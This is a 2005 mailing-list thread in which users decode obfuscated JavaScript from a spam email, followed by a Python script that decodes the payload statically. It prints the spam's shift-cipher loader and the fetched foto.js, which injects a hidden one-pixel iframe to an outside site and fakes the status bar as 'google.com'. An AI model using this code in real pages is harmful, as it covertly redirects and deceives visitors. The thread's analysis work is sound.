
Re: decyphering spam



On Thu, 2005-06-02 at 17:06 -0400, Darryl Clarke wrote:
> On 6/2/05, Steve Lamb <grey@dmiyu.org> wrote:
> > michael wrote:
> > > how do I decipher what the following HTML/javascript attempts (original
> > > 'write' was all one line)?
> > 
> >     Personally, I used Python's urllib.unquote and got the following:
> > 
> > <SCRIPT LANGUAGE="javascript">document.write('empty..');</SCRIPT><script
> > language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1));
> > var
> > t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>
> > 
> > > dF('*8HXHWNUY*75QFSLZFLJ*8I*77of%
> > > 7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')</script>
> > 
> >     Which is then fed the above segment to decode.  Don't feel like digging
> > into the above javascript to make a Python equivalent decoder for that
> > section.  Maybe someone else will jump in?  :D
> > 
> 
> That final segment decodes to this:
>  
> SCRIPT LANGUAGE="javascript" SRC="foto.js"> // SAMPLE SCRIPT #2 -
> CALLING AN EXTERNAL JS FILE </SCRIPT
> 
> which, unless there was a base reference issued in the actual spam,
> leads nowhere. :)
> 

Well, I can 'wget' the foto.js from the site, which is (if anybody is
interested!) a bit too simple to decode, but those up for the challenge
could decipher the index.php

url = "http://www.trafficpro.us/index.php";
qwe = ' di'+'spl'+'ay:n'+'one'+';}</s'+'ty'+'le>';
rty = '" FR'+'AMEB'+'ORD'+'ER="0" WIDTH=1 HEIGHT=1'+'0%></I'+'F'+'RA'+'ME>';
uio = '<s'+'tyl'+'e type="text/css">';
asd = '<IF'+'RA'+'ME SRC="';
fgh = ' .t'+'ex'+'t {vi'+'sib'+'ili'+'ty:h'+'idd'+'en;';
a = asd+url+rty;
b = uio+fgh+qwe;
document.write (a);
document.write (b);
self.focus();
setInterval("window.status='google.com'",7);



> --
> ~ Darryl  ~ smartssa@gmail.com
> http://smartssa.com / http://darrylclarke.com
> 
-- 
Michael Bane
Atmospheric Physics Group
University of Manchester
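
The dF() routine quoted above, ported to Python as an added example (not code from any poster in this thread): it decodes the payload statically, so nothing from the spam is executed. The names js_unescape, decode_df and script_sources are chosen here; SAMPLE is the thread's payload with the mail line-wrap inside "%7B" rejoined.

```python
import re

# Payload quoted in the thread; the mail line-wrap inside "%7B" is rejoined.
SAMPLE = ('*8HXHWNUY*75QFSLZFLJ*8I*77of%7Bfxhwnuy*77*75XWH*8I*77ktyt3ox*77*8J'
          '*5I*5F44*75XFRUQJ*75XHWNUY*75*787*752*75HFQQNSL*75FS*75J%5DYJWSFQ'
          '*75OX*75KNQJ*5I*5F*8H4XHWNUY*8J*5I*5F5')

_ESC = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')


def js_unescape(s):
    """Mimic JavaScript unescape(): each %XX or %uXXXX becomes one code unit.

    urllib's unquote would instead treat %XX bytes as UTF-8, which differs
    from the browser for values of 0x80 and above.
    """
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def decode_df(s):
    """Static equivalent of the spam's dF(): return the markup it would write."""
    if not s or s[-1] not in '0123456789':
        raise ValueError('expected a trailing decimal digit as the shift')
    shift = int(s[-1])                 # last character is the shift amount
    s1 = js_unescape(s[:-1])           # first unescape pass
    # Subtract the shift from every code unit; wrap like String.fromCharCode.
    shifted = ''.join(chr((ord(c) - shift) & 0xFFFF) for c in s1)
    return js_unescape(shifted)        # second pass: '*' has become '%'


def script_sources(markup):
    """List the SRC values of script tags in decoded markup, for triage."""
    pattern = r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)'
    return re.findall(pattern, markup, re.I)


if __name__ == '__main__':
    decoded = decode_df(SAMPLE)
    print(repr(decoded))
    print(script_sources(decoded))
```
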


